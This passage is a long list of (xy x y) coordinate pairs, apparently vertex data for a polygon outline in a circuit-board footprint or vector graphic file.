(xy 2.259838 -0.028307) (xy 2.260599 -0.024488) (xy 2.26384 -0.018279) (xy 2.266112 -0.019623)
(xy 2.274924 -0.018413) (xy 2.283674 -0.010451) (xy 2.291221 -0.002773) (xy 2.289932 -0.008466)
(xy 2.291072 -0.010948) (xy 2.300706 -0.002386) (xy 2.306849 0.004234) (xy 2.319522 0.017458)
(xy 2.324805 0.020974) (xy 2.324212 0.01905) (xy 2.320832 0.009864) (xy 2.325941 0.011751)
(xy 2.34044 0.02537) (xy 2.358365 0.044049) (xy 2.373207 0.060809) (xy 2.378897 0.069415)
(xy 2.374899 0.068393) (xy 2.369833 0.066362) (xy 2.376217 0.073978) (xy 2.383366 0.080896)
(xy 2.398758 0.097323) (xy 2.406405 0.109569) (xy 2.406571 0.111821) (xy 2.411177 0.120589)
(xy 2.417106 0.12389) (xy 2.425745 0.131886) (xy 2.425114 0.136414) (xy 2.427422 0.145366)
(xy 2.433581 0.149114) (xy 2.442586 0.157077) (xy 2.442085 0.161754) (xy 2.443753 0.168815)
(xy 2.446866 0.169334) (xy 2.452387 0.174491) (xy 2.451099 0.1778) (xy 2.452052 0.18559)
(xy 2.455333 0.186267) (xy 2.460854 0.191425) (xy 2.459566 0.194734) (xy 2.460518 0.202523)
(xy 2.463799 0.2032) (xy 2.469321 0.208358) (xy 2.468033 0.211667) (xy 2.468553 0.219476)
(xy 2.471501 0.220134) (xy 2.476588 0.22632) (xy 2.475328 0.232834) (xy 2.475932 0.243695)
(xy 2.480327 0.245534) (xy 2.486224 0.250667) (xy 2.484966 0.254) (xy 2.486144 0.26178)
(xy 2.489606 0.262467) (xy 2.495693 0.268605) (xy 2.494604 0.275167) (xy 2.494697 0.286056)
(xy 2.498502 0.287867) (xy 2.503404 0.294469) (xy 2.501899 0.3048) (xy 2.501276 0.318751)
(xy 2.506468 0.321734) (xy 2.512677 0.327847) (xy 2.511642 0.334163) (xy 2.511915 0.3479)
(xy 2.515314 0.351809) (xy 2.520137 0.363069) (xy 2.518833 0.372534) (xy 2.518791 0.38794)
(xy 2.522982 0.393648) (xy 2.528057 0.405586) (xy 2.526799 0.427258) (xy 2.525584 0.44937)
(xy 2.530772 0.460964) (xy 2.535454 0.472054) (xy 2.538682 0.496397) (xy 2.539992 0.530341)
(xy 2.539999 0.5334) (xy 2.538866 0.567962) (xy 2.535776 0.593219) (xy 2.531195 0.605519)
(xy 2.530772 0.605837) (xy 2.525521 0.618076) (xy 2.526923 0.640203) (xy 2.528467 0.662007)
(xy 2.522532 0.668867) (xy 2.516479 0.675772) (xy 2.517946 0.689515) (xy 2.519032 0.706932)
(xy 2.515 0.715186) (xy 2.51036 0.726217) (xy 2.511642 0.732638) (xy 2.510698 0.743323)
(xy 2.506133 0.745067) (xy 2.499637 0.751166) (xy 2.500624 0.757496) (xy 2.50046 0.771166)
(xy 2.497158 0.775014) (xy 2.492426 0.784803) (xy 2.493433 0.787401) (xy 2.491992 0.797723)
(xy 2.489199 0.800101) (xy 2.484172 0.810241) (xy 2.485328 0.813386) (xy 2.483853 0.820719)
(xy 2.480733 0.821267) (xy 2.475016 0.826269) (xy 2.476138 0.829149) (xy 2.475046 0.840006)
(xy 2.472266 0.842434) (xy 2.467239 0.852575) (xy 2.468394 0.855719) (xy 2.46692 0.863053)
(xy 2.463799 0.863601) (xy 2.458278 0.868758) (xy 2.459566 0.872067) (xy 2.458614 0.879857)
(xy 2.455333 0.880534) (xy 2.4495 0.885364) (xy 2.450551 0.888113) (xy 2.448211 0.897016)
(xy 2.442048 0.900754) (xy 2.43333 0.909144) (xy 2.434129 0.914341) (xy 2.433235 0.922173)
(xy 2.429933 0.922867) (xy 2.424241 0.927905) (xy 2.425378 0.930813) (xy 2.42321 0.940771)
(xy 2.415294 0.947489) (xy 2.406103 0.954466) (xy 2.407093 0.956476) (xy 2.40445 0.962014)
(xy 2.391821 0.976703) (xy 2.371476 0.99801) (xy 2.356293 1.013131) (xy 2.330806 1.037312)
(xy 2.309607 1.055985) (xy 2.295666 1.066607) (xy 2.292114 1.068086) (xy 2.283831 1.073401)
(xy 2.280643 1.079373) (xy 2.272675 1.088032) (xy 2.268179 1.087419) (xy 2.261118 1.089088)
(xy 2.260599 1.092201) (xy 2.255442 1.097722) (xy 2.252133 1.096434) (xy 2.244343 1.097386)
(xy 2.243666 1.100667) (xy 2.238509 1.106188) (xy 2.235199 1.104901) (xy 2.22741 1.105853)
(xy 2.226733 1.109134) (xy 2.221731 1.114851) (xy 2.218851 1.113729) (xy 2.207934 1.114707)
(xy 2.20588 1.117093) (xy 2.19479 1.121827) (xy 2.188362 1.120558) (xy 2.177659 1.121153)
(xy 2.175933 1.125323) (xy 2.169027 1.13114) (xy 2.15569 1.129776) (xy 2.138189 1.129162)
(xy 2.12979 1.133848) (xy 2.118196 1.140089) (xy 2.097578 1.142977) (xy 2.095499 1.143001)
(xy 2.074446 1.140527) (xy 2.061691 1.134508) (xy 2.061209 1.133848) (xy 2.049649 1.128665)
(xy 2.035309 1.129776) (xy 2.019278 1.130547) (xy 2.015066 1.125323) (xy 2.008914 1.119524)
(xy 2.002366 1.120662) (xy 1.991486 1.120413) (xy 1.989666 1.116429) (xy 1.983497 1.110995)
(xy 1.976966 1.112196) (xy 1.966076 1.112137) (xy 1.964266 1.108368) (xy 1.959063 1.10356)
(xy 1.955799 1.104901) (xy 1.94801 1.103948) (xy 1.947333 1.100667) (xy 1.942175 1.095146)
(xy 1.938866 1.096434) (xy 1.931064 1.095763) (xy 1.930399 1.0927) (xy 1.924912 1.085632)
(xy 1.92253 1.085851) (xy 1.911845 1.081643) (xy 1.900736 1.071034) (xy 1.892563 1.062798)
(xy 1.892518 1.066801) (xy 1.890656 1.068304) (xy 1.879987 1.059196) (xy 1.86677 1.045634)
(xy 1.85192 1.030326) (xy 1.845078 1.024728) (xy 1.846874 1.028701) (xy 1.854174 1.04022)
(xy 1.850732 1.039438) (xy 1.843709 1.034091) (xy 1.833792 1.022251) (xy 1.833361 1.015469)
(xy 1.830152 1.006428) (xy 1.816688 0.992978) (xy 1.812434 0.989682) (xy 1.797134 0.975874)
(xy 1.791183 0.965294) (xy 1.791569 0.963794) (xy 1.789007 0.955224) (xy 1.782818 0.951554)
(xy 1.773831 0.943563) (xy 1.774351 0.938854) (xy 1.772044 0.929902) (xy 1.765885 0.926154)
(xy 1.756879 0.918191) (xy 1.757381 0.913513) (xy 1.755712 0.906453) (xy 1.752599 0.905934)
(xy 1.747078 0.900776) (xy 1.748366 0.897467) (xy 1.747414 0.889678) (xy 1.744133 0.889001)
(xy 1.738379 0.884054) (xy 1.739478 0.881216) (xy 1.738226 0.869754) (xy 1.731914 0.861058)
(xy 1.724099 0.848975) (xy 1.72478 0.843442) (xy 1.72343 0.838662) (xy 1.719644 0.838201)
(xy 1.71327 0.833234) (xy 1.714499 0.829734) (xy 1.713979 0.821925) (xy 1.711032 0.821267)
(xy 1.705945 0.815081) (xy 1.707204 0.808567) (xy 1.706956 0.797687) (xy 1.702971 0.795867)
(xy 1.697537 0.789698) (xy 1.698738 0.783167) (xy 1.698489 0.772287) (xy 1.694504 0.770467)
(xy 1.688889 0.764369) (xy 1.689942 0.758624) (xy 1.688918 0.744883) (xy 1.685305 0.741105)
(xy 1.679976 0.730756) (xy 1.681224 0.727178) (xy 1.680879 0.714567) (xy 1.676399 0.706967)
(xy 1.67056 0.692672) (xy 1.671937 0.686171) (xy 1.672941 0.671962) (xy 1.670617 0.66675)
(xy 1.66562 0.650538) (xy 1.661894 0.62203) (xy 1.659448 0.585067) (xy 1.658294 0.543488)
(xy 1.658441 0.501134) (xy 1.6599 0.461846) (xy 1.662682 0.429463) (xy 1.666798 0.407826)
(xy 1.669895 0.401615) (xy 1.672849 0.38948) (xy 1.671094 0.37551) (xy 1.670504 0.359519)
(xy 1.676052 0.3556) (xy 1.6822 0.349124) (xy 1.680633 0.338667) (xy 1.68001 0.324716)
(xy 1.685201 0.321734) (xy 1.691349 0.315598) (xy 1.690271 0.309034) (xy 1.69052 0.298154)
(xy 1.694504 0.296334) (xy 1.699939 0.290164) (xy 1.698738 0.283634) (xy 1.698987 0.272754)
(xy 1.702971 0.270934) (xy 1.708405 0.264764) (xy 1.707204 0.258234) (xy 1.707263 0.247344)
(xy 1.711032 0.245534) (xy 1.71584 0.240331) (xy 1.714499 0.237067) (xy 1.71502 0.229259)
(xy 1.717967 0.2286) (xy 1.723054 0.222415) (xy 1.721795 0.2159) (xy 1.722398 0.205039)
(xy 1.726793 0.2032) (xy 1.733018 0.198524) (xy 1.731981 0.195621) (xy 1.734322 0.186719)
(xy 1.740485 0.182981) (xy 1.749202 0.17459) (xy 1.748403 0.169394) (xy 1.749692 0.161636)
(xy 1.753511 0.160867) (xy 1.75972 0.157627) (xy 1.758376 0.155354) (xy 1.759586 0.146543)
(xy 1.767548 0.137793) (xy 1.77541 0.130062) (xy 1.769533 0.131234) (xy 1.765553 0.131058)
(xy 1.773766 0.123031) (xy 1.786565 0.110612) (xy 1.790717 0.103353) (xy 1.797191 0.092225)
(xy 1.814488 0.074067) (xy 1.839484 0.05145) (xy 1.869052 0.026943) (xy 1.900067 0.003115)
(xy 1.929403 -0.017465) (xy 1.953934 -0.032225) (xy 1.958268 -0.034385) (xy 1.982472 -0.046536)
(xy 1.997301 -0.055396) (xy 1.999877 -0.059221) (xy 1.999318 -0.059259) (xy 1.98008 -0.054169)
(xy 1.952226 -0.040625) (xy 1.919953 -0.021245) (xy 1.88746 0.001353) (xy 1.858944 0.024554)
(xy 1.847904 0.035133) (xy 1.826503 0.055916) (xy 1.808926 0.070686) (xy 1.799106 0.0762)
(xy 1.786974 0.081908) (xy 1.766065 0.097276) (xy 1.739249 0.11967) (xy 1.709394 0.146455)
(xy 1.679369 0.174998) (xy 1.652042 0.202665) (xy 1.630281 0.226821) (xy 1.618961 0.241616)
(xy 1.597506 0.276861) (xy 1.571605 0.323797) (xy 1.543226 0.378445) (xy 1.514335 0.436824)
(xy 1.4869 0.494954) (xy 1.462887 0.548856) (xy 1.444264 0.594548) (xy 1.443376 0.5969)
(xy 1.408515 0.695475) (xy 1.382038 0.784649) (xy 1.363054 0.86919) (xy 1.350674 0.953864)
(xy 1.344005 1.043438) (xy 1.342152 1.138767) (xy -0.11322 1.138767) (xy -0.112779 1.044772)
(xy -0.126479 0.889483) (xy -0.154208 0.73859) (xy -0.195554 0.594284) (xy -0.250108 0.458754)
(xy -0.254447 0.449577) (xy -0.320977 0.327045) (xy -0.396776 0.218673) (xy -0.481937 0.124389)
(xy -0.57655 0.044124) (xy -0.680708 -0.022194) (xy -0.765543 -0.06129) (xy 2.027205 -0.06129)
(xy 2.035527 -0.059935) (xy 2.046509 -0.061491) (xy 2.04664 -0.064381) (xy 2.035308 -0.066403)
(xy 2.030412 -0.06505) (xy 2.027205 -0.06129) (xy -0.765543 -0.06129) (xy -0.794501 -0.074635)
(xy -0.918021 -0.11327) (xy -1.006658 -0.131532) (xy -1.063343 -0.138221) (xy -1.132066 -0.141972)
(xy -1.208208 -0.142895) (xy -1.287153 -0.141101) (xy -1.36428 -0.136702) (xy -1.434973 -0.129807)
(xy -1.494612 -0.120528) (xy -1.4986 -0.11972) (xy -1.565082 -0.105463) (xy -1.618748 -0.092843)
(xy -1.658641 -0.082119) (xy -1.683804 -0.073551) (xy -1.693282 -0.067396) (xy -1.693334 -0.067021)
(xy -1.685569 -0.063927) (xy -1.665019 -0.062197) (xy -1.635795 -0.062134) (xy -1.629422 -0.062342)
(xy -1.598283 -0.062696) (xy -1.574329 -0.061403) (xy -1.562032 -0.058739) (xy -1.561417 -0.05816)
(xy -1.551216 -0.054849) (xy -1.544896 -0.056308) (xy -1.534183 -0.055915) (xy -1.532467 -0.051971)
(xy -1.526298 -0.046537) (xy -1.519767 -0.047738) (xy -1.508906 -0.047134) (xy -1.507067 -0.042739)
(xy -1.501934 -0.036841) (xy -1.4986 -0.0381) (xy -1.490811 -0.037147) (xy -1.490134 -0.033866)
(xy -1.484976 -0.028345) (xy -1.481667 -0.029633) (xy -1.473878 -0.028681) (xy -1.4732 -0.0254)
(xy -1.46837 -0.019567) (xy -1.465621 -0.020618) (xy -1.456664 -0.018351) (xy -1.453157 -0.012572)
(xy -1.445005 -0.002591) (xy -1.440689 -0.002038) (xy -1.430487 0.00217) (xy -1.415822 0.015363)
(xy -1.414408 0.016934) (xy -1.403536 0.028151) (xy -1.400474 0.028922) (xy -1.401088 0.027517)
(xy -1.404486 0.018365) (xy -1.39942 0.020152) (xy -1.384946 0.033558) (xy -1.366969 0.052044)
(xy -1.351312 0.069548) (xy -1.344138 0.079877) (xy -1.3462 0.081033) (xy -1.349356 0.081544)
(xy -1.341118 0.090546) (xy -1.337734 0.093608) (xy -1.32391 0.108386) (xy -1.318657 0.119272)
(xy -1.318762 0.119889) (xy -1.314148 0.129011) (xy -1.308228 0.132357) (xy -1.299588 0.140353)
(xy -1.300219 0.144881) (xy -1.297912 0.153833) (xy -1.291752 0.157581) (xy -1.282747 0.165544)
(xy -1.283249 0.170221) (xy -1.28158 0.177282) (xy -1.278467 0.1778) (xy -1.272946 0.182958)
(xy -1.274234 0.186267) (xy -1.273282 0.194057) (xy -1.27 0.194734) (xy -1.264479 0.199891)
(xy -1.265767 0.2032) (xy -1.264815 0.21099) (xy -1.261534 0.211667) (xy -1.256013 0.216825)
(xy -1.2573 0.220134) (xy -1.256348 0.227923) (xy -1.253067 0.2286) (xy -1.247546 0.233758)
(xy -1.248834 0.237067) (xy -1.247656 0.244846) (xy -1.244194 0.245534) (xy -1.238107 0.251672)
(xy -1.239196 0.258234) (xy -1.239497 0.269142) (xy -1.236134 0.270934) (xy -1.231704 0.277151)
(xy -1.233072 0.283634) (xy -1.232823 0.294514) (xy -1.228839 0.296334) (xy -1.223404 0.302503)
(xy -1.224605 0.309034) (xy -1.223969 0.319893) (xy -1.219536 0.321734) (xy -1.213401 0.328213)
(xy -1.214967 0.338667) (xy -1.215656 0.352521) (xy -1.210734 0.3556) (xy -1.204918 0.362109)
(xy -1.206274 0.371821) (xy -1.206568 0.387542) (xy -1.202267 0.3937) (xy -1.196958 0.405298)
(xy -1.198236 0.415504) (xy -1.199696 0.43368) (xy -1.197169 0.441666) (xy -1.194769 0.453643)
(xy -1.192802 0.478865) (xy -1.191471 0.513645) (xy -1.190978 0.554296) (xy -1.190978 0.554567)
(xy -1.191465 0.595244) (xy -1.192791 0.630073) (xy -1.194755 0.655368) (xy -1.197153 0.667441)
(xy -1.197169 0.667468) (xy -1.200016 0.683312) (xy -1.198236 0.69363) (xy -1.197972 0.709321)
(xy -1.202267 0.715434) (xy -1.207563 0.727027) (xy -1.206274 0.737313) (xy -1.205906 0.750619)
(xy -1.210734 0.753534) (xy -1.21652 0.760069) (xy -1.214967 0.770467) (xy -1.214344 0.784418)
(xy -1.219536 0.787401) (xy -1.225683 0.793536) (xy -1.224605 0.800101) (xy -1.224854 0.810981)
(xy -1.228839 0.812801) (xy -1.234273 0.81897) (xy -1.233072 0.825501) (xy -1.23277 0.836409)
(xy -1.236134 0.838201) (xy -1.240564 0.844417) (xy -1.239196 0.850901) (xy -1.239799 0.861762)
(xy -1.244194 0.863601) (xy -1.250092 0.868734) (xy -1.248834 0.872067) (xy -1.249786 0.879857)
(xy -1.253067 0.880534) (xy -1.258588 0.885691) (xy -1.2573 0.889001) (xy -1.258253 0.89679)
(xy -1.261534 0.897467) (xy -1.267055 0.902625) (xy -1.265767 0.905934) (xy -1.266719 0.913723)
(xy -1.27 0.914401) (xy -1.275522 0.919558) (xy -1.274234 0.922867) (xy -1.275186 0.930657)
(xy -1.278467 0.931334) (xy -1.2843 0.936164) (xy -1.283249 0.938913) (xy -1.285589 0.947816)
(xy -1.291752 0.951554) (xy -1.30074 0.959544) (xy -1.300219 0.964254) (xy -1.302453 0.973261)
(xy -1.308228 0.976778) (xy -1.318209 0.98493) (xy -1.318762 0.989245) (xy -1.32297 0.999447)
(xy -1.336163 1.014112) (xy -1.337734 1.015526) (xy -1.348951 1.026398) (xy -1.349722 1.02946)
(xy -1.348317 1.028846) (xy -1.339165 1.025448) (xy -1.340952 1.030514) (xy -1.354358 1.044988)
(xy -1.372844 1.062966) (xy -1.390348 1.078623) (xy -1.400677 1.085796) (xy -1.401833 1.083734)
(xy -1.402344 1.080578) (xy -1.411346 1.088816) (xy -1.414408 1.092201) (xy -1.429186 1.106025)
(xy -1.440072 1.111277) (xy -1.440689 1.111172) (xy -1.449811 1.115787) (xy -1.453157 1.121707)
(xy -1.461125 1.130365) (xy -1.465621 1.129752) (xy -1.472682 1.131421) (xy -1.4732 1.134534)
(xy -1.478358 1.140055) (xy -1.481667 1.138767) (xy -1.489457 1.139719) (xy -1.490134 1.143001)
(xy -1.495291 1.148522) (xy -1.4986 1.147234) (xy -1.50638 1.148412) (xy -1.507067 1.151873)
(xy -1.513205 1.157961) (xy -1.519767 1.156872) (xy -1.530647 1.157121) (xy -1.532467 1.161105)
(xy -1.538568 1.166715) (xy -1.544339 1.165656) (xy -1.558245 1.164749) (xy -1.561838 1.166726)
(xy -1.572675 1.169629) (xy -1.595232 1.171584) (xy -1.624699 1.172583) (xy -1.656265 1.172616)
(xy -1.685118 1.171676) (xy -1.706448 1.169753) (xy -1.715361 1.167008) (xy -1.725403 1.163949)
(xy -1.731705 1.165443) (xy -1.742418 1.165049) (xy -1.744134 1.161105) (xy -1.750303 1.155671)
(xy -1.756834 1.156872) (xy -1.767695 1.156268) (xy -1.769534 1.151873) (xy -1.774667 1.145976)
(xy -1.778 1.147234) (xy -1.78579 1.146282) (xy -1.786467 1.143001) (xy -1.791625 1.137479)
(xy -1.794934 1.138767) (xy -1.802723 1.137815) (xy -1.8034 1.134534) (xy -1.808231 1.128701)
(xy -1.81098 1.129752) (xy -1.819803 1.127308) (xy -1.823879 1.120573) (xy -1.830642 1.111281)
(xy -1.834284 1.111795) (xy -1.842728 1.109898) (xy -1.85589 1.098198) (xy -1.855897 1.09819)
(xy -1.865463 1.088912) (xy -1.866789 1.091171) (xy -1.866323 1.092201) (xy -1.868555 1.093492)
(xy -1.880255 1.08472) (xy -1.898899 1.067781) (xy -1.899177 1.067515) (xy -1.918677 1.047352)
(xy -1.931272 1.031481) (xy -1.934223 1.023803) (xy -1.937525 1.014988) (xy -1.950716 1.001546)
(xy -1.95364 0.999177) (xy -1.965561 0.988797) (xy -1.96632 0.985643) (xy -1.964267 0.986367)
(xy -1.95843 0.987409) (xy -1.966252 0.979808) (xy -1.975702 0.968426) (xy -1.975624 0.962446)
(xy -1.977466 0.95559) (xy -1.984173 0.951813) (xy -1.993674 0.94385) (xy -1.993352 0.938913)
(xy -1.995021 0.931853) (xy -1.998134 0.931334) (xy -2.003655 0.926176) (xy -2.002367 0.922867)
(xy -2.003319 0.915078) (xy -2.0066 0.914401) (xy -2.012122 0.909243) (xy -2.010834 0.905934)
(xy -2.011786 0.898144) (xy -2.015067 0.897467) (xy -2.020588 0.89231) (xy -2.0193 0.889001)
(xy -2.020253 0.881211) (xy -2.023534 0.880534) (xy -2.029055 0.875376) (xy -2.027767 0.872067)
(xy -2.028288 0.864259) (xy -2.031235 0.863601) (xy -2.036322 0.857415) (xy -2.035062 0.850901)
(xy -2.035311 0.84002) (xy -2.039296 0.838201) (xy -2.04473 0.832031) (xy -2.043529 0.825501)
(xy -2.043778 0.81462) (xy -2.047762 0.812801) (xy -2.053197 0.806631) (xy -2.051996 0.800101)
(xy -2.052784 0.789247) (xy -2.0574 0.787401) (xy -2.063896 0.781302) (xy -2.062909 0.774972)
(xy -2.062576 0.761612) (xy -2.065442 0.75803) (xy -2.069521 0.747273) (xy -2.068318 0.736592)
(xy -2.068744 0.722688) (xy -2.074264 0.719667) (xy -2.080953 0.712866) (xy -2.079454 0.699019)
(xy -2.077754 0.682014) (xy -2.080653 0.674428) (xy -2.083062 0.664909) (xy -2.084822 0.642254)
(xy -2.08594 0.610249) (xy -2.086424 0.572681) (xy -2.08628 0.533334) (xy -2.085516 0.495994)
(xy -2.084138 0.464446) (xy -2.082153 0.442477) (xy -2.080206 0.434452) (xy -2.078199 0.419598)
(xy -2.081103 0.40651) (xy -2.087224 0.403928) (xy -2.097433 0.415719) (xy -2.111037 0.440015)
(xy -2.127339 0.474945) (xy -2.145646 0.51864) (xy -2.165261 0.56923) (xy -2.185491 0.624845)
(xy -2.205639 0.683616) (xy -2.225011 0.743674) (xy -2.242912 0.803147) (xy -2.258647 0.860168)
(xy -2.27152 0.912865) (xy -2.274625 0.927101) (xy -2.283168 0.96937) (xy -2.289365 1.005881)
(xy -2.29359 1.040943) (xy -2.296219 1.078862) (xy -2.297628 1.123949) (xy -2.298192 1.18051)
(xy -2.298248 1.198034) (xy -9.616035 1.198034) (xy -9.724242 1.118004) (xy -9.873009 0.997708)
(xy -10.008697 0.87691) (xy -10.1307 0.756149) (xy -10.238411 0.635964) (xy -10.331226 0.516895)
(xy -10.408539 0.39948) (xy -10.469553 0.284668) (xy -10.509674 0.198419) (xy -10.665391 0.119076)
(xy -10.896627 -0.00399) (xy -11.112222 -0.129544) (xy -11.31204 -0.25747) (xy -11.49594 -0.387654)
(xy -11.663786 -0.519981) (xy -11.815438 -0.654338) (xy -11.95076 -0.790608) (xy -12.069612 -0.928678)
(xy -12.171856 -1.068433) (xy -12.249334 -1.195147) (xy -12.294124 -1.285014) (xy -12.335087 -1.384934)
(xy -12.370217 -1.489059) (xy -12.397511 -1.591543) (xy -12.412927 -1.672166) (xy -12.419508 -1.734115)
(xy -12.422892 -1.806909) (xy -12.423147 -1.884774) (xy -12.420341 -1.96194) (xy -12.414541 -2.032634)
(xy -12.408158 -2.078566) (xy -12.372617 -2.233608) (xy -12.320266 -2.386635) (xy -12.251107 -2.537642)
(xy -12.165142 -2.686625) (xy -12.062374 -2.833578) (xy -11.942806 -2.978497) (xy -11.832593 -3.095441)
(xy -11.788142 -3.139319) (xy -11.744049 -3.181498) (xy -11.702146 -3.220347) (xy -11.664269 -3.254237)
(xy -11.632249 -3.281539) (xy -11.60792 -3.300622) (xy -11.593116 -3.309857) (xy -11.590685 -3.310466)
(xy -11.587064 -3.302725) (xy -11.582066 -3.282096) (xy -11.576581 -3.252472) (xy -11.574699 -3.240616)
(xy -11.556892 -3.140854) (xy -11.532625 -3.030733) (xy -11.503159 -2.914964) (xy -11.469754 -2.798259)
(xy -11.43367 -2.685329) (xy -11.403123 -2.599266) (xy -11.322492 -2.40342) (xy -11.228851 -2.211546)
(xy -11.123485 -2.025575) (xy -11.007676 -1.847437) (xy -10.882709 -1.679059) (xy -10.749867 -1.522373)
(xy -10.610434 -1.379306) (xy -10.560634 -1.333097) (xy -10.520153 -1.297144) (xy -10.480606 -1.263104)
(xy -10.44404 -1.232627) (xy -10.412499 -1.207361) (xy -10.388028 -1.188957) (xy -10.372672 -1.179064)
(xy -10.36844 -1.17809) (xy -10.369222 -1.186782) (xy -10.372252 -1.210739) (xy -10.37732 -1.24847)
(xy -10.384217 -1.298486) (xy -10.392737 -1.359296) (xy -10.402669 -1.429411) (xy -10.413805 -1.50734)
(xy -10.425938 -1.591594) (xy -10.436388 -1.663699) (xy -10.451402 -1.767043) (xy -10.467415 -1.877341)
(xy -10.483941 -1.991238) (xy -10.500494 -2.105376) (xy -10.516586 -2.216399) (xy -10.53173 -2.320951)
(xy -10.545441 -2.415673) (xy -10.557232 -2.497211) (xy -10.557909 -2.501899) (xy -10.569744 -2.583772)
(xy -10.583508 -2.678921) (xy -10.598696 -2.783863) (xy -10.614803 -2.895117) (xy -10.631327 -3.009201)
(xy -10.647761 -3.122632) (xy -10.663604 -3.231929) (xy -10.677235 -3.325929) (xy -10.689807 -3.413095)
(xy -10.701525 -3.495293) (xy -10.712178 -3.570987) (xy -10.721559 -3.638641) (xy -10.729456 -3.696718)
(xy -10.735659 -3.743682) (xy -10.739961 -3.777997) (xy -10.74215 -3.798126) (xy -10.742329 -3.802913)
(xy -10.734185 -3.802165) (xy -10.713184 -3.794268) (xy -10.681315 -3.780215) (xy -10.640567 -3.761001)
(xy -10.592929 -3.737621) (xy -10.54039 -3.711071) (xy -10.484939 -3.682344) (xy -10.428566 -3.652436)
(xy -10.373258 -3.622341) (xy -10.321005 -3.593054) (xy -10.309047 -3.586203) (xy -10.10327 -3.460851)
(xy -9.913812 -3.331105) (xy -9.74062 -3.196897) (xy -9.583642 -3.058161) (xy -9.442827 -2.91483)
(xy -9.318122 -2.766837) (xy -9.209476 -2.614115) (xy -9.116835 -2.456597) (xy -9.040149 -2.294217)
(xy -8.979364 -2.126909) (xy -8.934428 -1.954604) (xy -8.906779 -1.789511) (xy -8.899916 -1.709632)
(xy -8.897209 -1.617937) (xy -8.898443 -1.51897) (xy -8.903405 -1.417276) (xy -8.911884 -1.317399)
(xy -8.923665 -1.223883) (xy -8.936764 -1.149646) (xy -8.979989 -0.9758) (xy -9.037841 -0.798498)
(xy -9.109117 -0.620294) (xy -9.192616 -0.443744) (xy -9.287134 -0.271405) (xy -9.391469 -0.105832)
(xy -9.496783 0.040525) (xy -9.520069 0.070856) (xy -9.535184 0.093302) (xy -9.541786 0.111517)
(xy -9.539534 0.129154) (xy -9.528089 0.149868) (xy -9.507109 0.177312) (xy -9.481056 0.209237)
(xy -9.403793 0.293856) (xy -9.310046 0.378488) (xy -9.200261 0.462854) (xy -9.074884 0.546674)
(xy -8.934362 0.629669) (xy -8.779141 0.71156) (xy -8.609668 0.792066) (xy -8.426389 0.870909)
(xy -8.4201 0.873483) (xy -8.3185 0.91501) (xy -8.232368 0.823689) (xy -8.201488 0.790086)
(xy -8.174823 0.759442) (xy -8.154605 0.734448) (xy -8.143065 0.717793) (xy -8.141365 0.714016)
(xy -8.142322 0.707058) (xy -8.147881 0.694251) (xy -8.158624 0.674699) (xy -8.175132 0.647506)
(xy -8.197988 0.611776) (xy -8.227775 0.566612) (xy -8.265074 0.511119) (xy -8.310468 0.444401)
(xy -8.357336 0.376062) (xy -2.073665 0.376062) (xy -2.072109 0.387043) (xy -2.069219 0.387174)
(xy -2.067197 0.375842) (xy -2.06855 0.370946) (xy -2.07231 0.367739) (xy -2.073665 0.376062)
(xy -8.357336 0.376062) (xy -8.364538 0.365562) (xy -8.39183 0.325967) (xy -2.061115 0.325967)
(xy -2.061038 0.331381) (xy -2.056362 0.322701) (xy -2.048054 0.301823) (xy -2.046036 0.296334)
(xy -2.031635 0.259506) (xy -2.015171 0.221395) (xy -2.003868 0.197637) (xy -1.987692 0.169099)
(xy -1.965522 0.134221) (xy -1.941819 0.09998) (xy -1.938929 0.096037) (xy -1.920464 0.070724)
(xy -1.912036 0.058253) (xy -1.913367 0.058037) (xy -1.924178 0.069489) (xy -1.928648 0.074464)
(xy -1.964279 0.120111) (xy -1.998205 0.173995) (xy -2.027687 0.230911) (xy -2.049982 0.285655)
(xy -2.061115 0.325967) (xy -8.39183 0.325967) (xy -8.42099 0.283664) (xy -8.490597 0.18251)
(xy -8.550538 0.094641) (xy -8.601013 0.019745) (xy -1.86948 0.019745) (xy -1.869423 0.025261)
(xy -1.867937 0.0254) (xy -1.86087 0.019615) (xy -1.853121 0.010584) (xy -1.845798 0.000555)
(xy -1.850183 0.002658) (xy -1.856317 0.007387) (xy -1.86948 0.019745) (xy -8.601013 0.019745)
(xy -8.601088 0.019634) (xy -8.614456 -0.000551) (xy -1.835191 -0.000551) (xy -1.834033 0)
(xy -1.826307 -0.00596) (xy -1.824567 -0.008466) (xy -1.82241 -0.016382) (xy -1.823568 -0.016933)
(xy -1.831294 -0.010972) (xy -1.833034 -0.008466) (xy -1.835191 -0.000551) (xy -8.614456 -0.000551)
(xy -8.628109 -0.021166) (xy -1.811867 -0.021166) (xy -1.807634 -0.016933) (xy -1.8034 -0.021166)
(xy -1.807634 -0.0254) (xy -1.811867 -0.021166) (xy -8.628109 -0.021166) (xy -8.633716 -0.029633)
(xy -1.794934 -0.029633) (xy -1.7907 -0.0254) (xy -1.786467 -0.029633) (xy -1.7907 -0.033866)
(xy -1.794934 -0.029633) (xy -8.633716 -0.029633) (xy -8.639324 -0.0381) (xy -1.778 -0.0381)
(xy -1.773767 -0.033866) (xy -1.769534 -0.0381) (xy -1.773767 -0.042333) (xy -1.778 -0.0381)
(xy -8.639324 -0.0381) (xy -8.642524 -0.042931) (xy -8.644868 -0.046566) (xy -1.7526 -0.046566)
(xy -1.748367 -0.042333) (xy -1.744134 -0.046566) (xy -1.748367 -0.0508) (xy -1.7526 -0.046566)
(xy -8.644868 -0.046566) (xy -8.650328 -0.055033) (xy -1.7272 -0.055033) (xy -1.722967 -0.0508)
(xy -1.718734 -0.055033) (xy -1.722967 -0.059266) (xy -1.7272 -0.055033) (xy -8.650328 -0.055033)
(xy -8.675122 -0.093478) (xy -8.699159 -0.132428) (xy -8.714912 -0.160203) (xy -8.722345 -0.176306)
(xy -8.735555 -0.236668) (xy -8.735494 -0.300361) (xy -8.723135 -0.363473) (xy -8.699453 -0.422086)
(xy -8.665423 -0.472285) (xy -8.643147 -0.494465) (xy -8.633274 -0.503128) (xy -8.624518 -0.51085)
(xy -8.615927 -0.517836) (xy -8.606546 -0.524289) (xy -8.59542 -0.530414) (xy -8.581597 -0.536415)
(xy -8.564121 -0.542498) (xy -8.542039 -0.548866) (xy -8.514397 -0.555724) (xy -8.480241 -0.563276)
(xy -8.438616 -0.571727) (xy -8.388569 -0.581281) (xy -8.329146 -0.592142) (xy -8.259392 -0.604516)
(xy -8.178353 -0.618607) (xy -8.085076 -0.634618) (xy -7.978606 -0.652755) (xy -7.857989 -0.673222)
(xy -7.722272 -0.696223) (xy -7.623464 -0.712975) (xy -7.571895 -0.721723) (xy -7.464605 -0.938351)
